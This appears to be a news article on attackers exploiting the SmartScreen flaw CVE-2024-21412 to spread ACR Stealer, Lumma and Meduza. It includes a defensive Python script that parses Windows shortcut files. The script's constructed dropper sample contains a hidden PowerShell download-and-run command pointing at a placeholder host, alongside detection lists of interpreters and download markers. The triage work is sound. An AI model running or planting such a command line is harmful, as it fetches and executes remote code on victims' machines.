Attackers are exploiting a flaw in Microsoft Defender SmartScreen to spread information-stealing malware. Microsoft fixed the bug months ago, but not every machine has received the update.
Security researchers warn that a vulnerability in Microsoft Defender SmartScreen is being actively exploited to deliver information-stealing malware. The flaw, tracked as CVE-2024-21412, lets attackers bypass SmartScreen's warning and run malicious files, in this campaign the stealers ACR Stealer, Lumma and Meduza. Microsoft patched it in the February 2024 Patch Tuesday update, but attackers continue to target systems that have not installed it.
Fortinet FortiGuard Labs has uncovered a campaign distributing files that slip past SmartScreen and pull the malware onto the victim's computer. The chain starts with an LNK file that the victim downloads and opens; the LNK downloads an executable that carries an HTML Application (HTA) script, the HTA decodes and runs PowerShell code, and that PowerShell downloads a decoy PDF and deploys the final malware.
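The first stage of the chain above is an ordinary Windows shortcut (.lnk) whose target and arguments point at a script interpreter with a download-and-run command line. The following Python script, added here as an illustration and not part of Fortinet's report or tooling, parses the ShellLink header, skips the optional LinkTargetIDList and LinkInfo structures, reads the StringData fields (name, relative path, working directory, arguments, icon) and flags the traits a triage analyst looks for: a script host as the target, download or execution markers in the arguments, and a minimized start window (ShowCommand 7, SW_SHOWMINNOACTIVE). The two sample LNK files are constructed inline by `build_lnk` so the script runs offline; they are not the campaign's real files, and the URL in the sample is a placeholder.

```python
import struct

# ShellLink LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
SW_SHOWNORMAL = 1
SW_SHOWMINNOACTIVE = 7  # start minimized without focus; common in malicious LNKs

# Heuristics (assumed list for this example, not from the original report)
INTERPRETERS = ("powershell", "pwsh", "mshta", "cmd.exe", "wscript", "cscript",
                "forfiles", "rundll32", "certutil")
MARKERS = ("http://", "https://", "downloadstring", "downloadfile",
           "invoke-webrequest", "iwr ", "iex", "-enc", "frombase64string",
           "-w hidden", "-windowstyle hidden")


def _string_data(s: str) -> bytes:
    """One StringData field: 2-byte character count, then UTF-16LE characters."""
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


def build_lnk(relative_path: str, arguments: str, working_dir: str = ".",
              show_cmd: int = SW_SHOWNORMAL) -> bytes:
    """Build a minimal, constructed ShellLink file (no IDList, no LinkInfo)."""
    flags = HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS | IS_UNICODE
    header = struct.pack("<I16sIIQQQIIIHHII",
                         0x4C, LNK_CLSID, flags,
                         0,             # FileAttributes
                         0, 0, 0,       # Creation/Access/Write time
                         0, 0,          # FileSize, IconIndex
                         show_cmd, 0,   # ShowCommand, HotKey
                         0, 0, 0)       # Reserved1..3
    return (header + _string_data(relative_path) + _string_data(working_dir)
            + _string_data(arguments))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields and ShowCommand of a ShellLink file."""
    if len(data) < 0x4C or struct.unpack_from("<I", data, 0)[0] != 0x4C \
            or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    show_cmd = struct.unpack_from("<I", data, 0x3C)[0]
    pos = 0x4C
    if flags & HAS_LINK_TARGET_ID_LIST:          # IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                    # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    fields = {"show_command": show_cmd}
    for bit, name in ((HAS_NAME, "name"), (HAS_RELATIVE_PATH, "relative_path"),
                      (HAS_WORKING_DIR, "working_dir"), (HAS_ARGUMENTS, "arguments"),
                      (HAS_ICON_LOCATION, "icon_location")):
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            nbytes = count * 2 if unicode else count
            raw = data[pos:pos + nbytes]
            fields[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
            pos += nbytes
    return fields


def assess_lnk(fields: dict) -> list:
    """List the reasons a parsed LNK looks like a download-and-run dropper."""
    reasons = []
    target = (fields.get("relative_path", "") + " " + fields.get("arguments", "")).lower()
    if any(i in target for i in INTERPRETERS):
        reasons.append("target is a script/command interpreter")
    hits = [m for m in MARKERS if m in fields.get("arguments", "").lower()]
    if hits:
        reasons.append("arguments contain download/execution markers: " + ", ".join(hits))
    if fields.get("show_command") == SW_SHOWMINNOACTIVE:
        reasons.append("window started minimized (ShowCommand=SW_SHOWMINNOACTIVE)")
    if len(fields.get("arguments", "")) > 200:
        reasons.append("unusually long command-line arguments")
    return reasons


# Constructed samples: a dropper-style shortcut and a harmless one.
DROPPER_LNK = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-w hidden -nop -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')\"",
    show_cmd=SW_SHOWMINNOACTIVE)
BENIGN_LNK = build_lnk(r"..\..\..\Windows\System32\notepad.exe", "readme.txt")

if __name__ == "__main__":
    for label, blob in (("dropper", DROPPER_LNK), ("benign", BENIGN_LNK)):
        print(label, assess_lnk(parse_lnk(blob)) or ["no findings"])
```

On a real host the same parser can be pointed at `%USERPROFILE%\Downloads\*.lnk`; the heuristics are deliberately simple string checks, so treat a hit as a reason to look, not as a verdict.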
The stealers harvest data from a broad set of applications: web browsers, cryptocurrency wallets, messaging apps, FTP and email clients, VPN services and password managers. ACR Stealer's target list includes Google Chrome, Microsoft Edge, Telegram, Signal, NordVPN and the password managers Bitwarden and 1Password.
Fortinet security analyst Cara Lin notes that attackers lure victims into clicking crafted links that fetch the LNK files, which then run the PowerShell stage and the malware. ACR Stealer hides its command-and-control address behind a Steam Community profile page, reading the real server from there instead of embedding it in the binary. Data taken from a password manager should be encrypted at rest, but the theft still carries a risk of misuse. The campaign has so far been seen mainly in the USA, Spain and Thailand, so computers in the Czech Republic are not its primary targets, yet any unpatched Windows system is exposed to the same flaw. Keep your software up to date, and not just Microsoft Defender.
Source: pctuning.cz